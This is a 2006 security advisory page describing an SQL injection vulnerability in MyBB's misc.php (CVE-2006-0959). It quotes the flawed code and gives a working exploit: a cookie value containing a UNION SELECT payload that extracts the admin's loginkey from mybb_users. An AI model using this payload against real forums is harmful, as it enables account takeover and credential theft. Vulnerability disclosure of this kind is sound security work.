|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 512 CVE : CVE-2006-0959 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : D3vil-0x1 Published : 01.03.2006
Advisory Content : MyBB New SQL Injection D3vil-0x1 < Devil-00 > The Inf.File :- misc.php Linez :- [code] $buddies = $mybb->user['buddylist']; $namesarray = explode(",",$buddies); if(is_array($namesarray)) { while(list($key, $buddyid) = each($namesarray)) { $sql .= "$comma'$buddyid'"; <== HERE :) Uncleard Var !! $comma = ","; } $timecut = time() - $mybb->settings['wolcutoff']; $query = $db->query("SELECT u.*, g.canusepms FROM ".TABLE_PREFIX."users u LEFT JOIN ".TABLE_PREFIX."usergroups g ON (g.gid=u.usergroup) WHERE u.uid IN ($sql)"); [/code] From 255 to 265 The GLOBALS unset function .. do not unset $_COOKIES .. then u can start attacking any var by cookies :) Tested MyBB 1.3 .. Register_Globals = On Explorer Exploit :- 1- Login by any username .. 2- Create new cookie ( name => "comma" value => "comma=0)%20%3C%3E%200%20UNION%20ALL%20SELECT%201,loginkey,3,4,5,6,7,8,9 ,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 ,6,7,8,9,0,1,2,3,4,5,6,7,8,9,1 FROM mybb_users WHERE uid=1/*" ) 3- Check The URL :- HOST/PATH/misc.php?action=buddypopup Where HOST = The Vic.Server And PATH = MyBB Dir.  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |